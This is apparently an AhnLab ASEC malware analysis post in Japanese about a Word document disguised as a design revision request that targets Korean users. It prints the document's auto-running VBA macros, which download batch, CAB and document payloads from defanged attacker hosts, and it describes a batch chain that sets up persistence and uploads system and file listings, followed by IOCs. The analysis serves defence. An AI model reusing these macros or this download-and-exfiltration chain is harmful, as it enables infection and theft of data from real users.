ASEC 分析チームは、韓国国内ユーザーをターゲットにした不正な Word ドキュメントが拡散していることを確認した。ファイル名は デザイン修正リクエスト.doc であり、以下のようにマクロの実行を誘導する画像が含まれている。


この Word ファイル内部には以下のように hxxp://filedownloaders.com/doc09 から追加ファイルをダウンロードする不正なマクロが含まれている。ユーザーがコンテンツの有効化ボタンをクリックすると、マクロが自動で実行され、追加の不正なファイルをダウンロードする。
Sub Document_Open()
Dim RetVal As Long
RetVal = download_func(0, "hxxp://filedownloaders[.]com/doc09/no6.txt", "C:\Users\Public\Documents\no1.bat", 0, 0)
RetVal = download_func (0, "hxxp://filedownloaders[.]com/doc09/vbs6.txt", "C:\Users\Public\Documents\setup.cab", 0, 0)
RetVal = download_func (0, "hxxp://filedownloaders[.]com/doc09/temp0101.doc", "C:\Users\Public\Documents\temp.doc", 0, 0)
Dim OpenDoc: Set OpenDoc = CreateObject("Word.Application")
OpenDoc.Visible = True
Dim WorkDone: Set WorkDone = OpenDoc.Documents.Open("C:\Users\Public\Documents\temp.doc")
その後、ダウンロードした temp.doc ドキュメントファイルを実行する。この Word ドキュメントは、以下のように韓国国内の企業を騙る内容を含んでいる。


temp.doc には先にダウンロードした no1.bat ファイルを実行させるマクロが含まれている。
Sub Document_Open()
WinExec "C:\Users\Public\Documents\no1.bat", 0
End Sub
Word ファイルによって実行された no1.bat は vvire.bat を実行させる。vvire.bat が存在しない場合、hxxp://filedownloaders.com/doc09/vbs6.txt からダウンロードした setup.cab ファイルの圧縮を解凍したあと、vvire.bat を実行する。

vvire.bat はレジストリ登録および no4.bat ファイルの実行、追加ファイルのダウンロード機能を実行する。

Start.vbs ファイルをレジストリに登録して vvire.bat ファイルが自動で実行されるようにし、no4.bat の実行後に no1.bat を削除する。以降は特定のファイルが存在するかを確認し hxxp://senteroman.com/dow11/%COMPUTERNAME%.txt から追加ファイルをダウンロード、および実行する。現在、当該ファイルの場合はダウンロードが行われないため、確認が不可能である。
Start.vbs ファイルは以下の通りである。

vvire.bat を通じて実行された no4.bat では、以下のようなユーザー PC の情報を収集して hxxp://senteroman.com/upl11/upload.php に流出させる機能を実行する。
- C:\Users\%username%\downloads\ リスト
- C:\Users\%username%\documents\ リスト
- C:\Users\%username%\desktop\ リスト
- C:\Program Files\ リスト
- IP 情報
- tasklist
- systeminfo
no4.bat の実行時、C:\Users\Public\Documents\ フォルダーに以下のように収集された情報が含まれたファイルが生成され、収集した情報をアップロードしたときに upok.txt ファイルを生成する。

このマルウェアのように、ドキュメント内部にマクロの有効化を誘導し、正規のユーザーを詐称する本文内容を持つマルウェアは拡散が続いているため、ユーザーの注意が必要である。また、ドキュメントに含まれるマクロが自動で実行されないように設定し、疑わしいドキュメントは閲覧しないようにしなければならない。
[V3 検知]
- Downloader/DOC.Generic
[関連 IOC 情報]
- d6358ce7399df51138f89c74f408c5a9
- dc7fda2a036016cca23f2867e644682c
- d2732f2c6f8531e812053e6252c421cf
- 66384f5091583b0c389918d5c8522cd6
- hxxp://senteroman.com/upl11/upload.php
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報
[…] 分析チームは、昨年12月に掲載した<デザイン修正リクエストのドキュメントに偽装した情報窃取目的の不正な …>と同じタイプの Word ドキュメントを確認した。今回確認された Word […]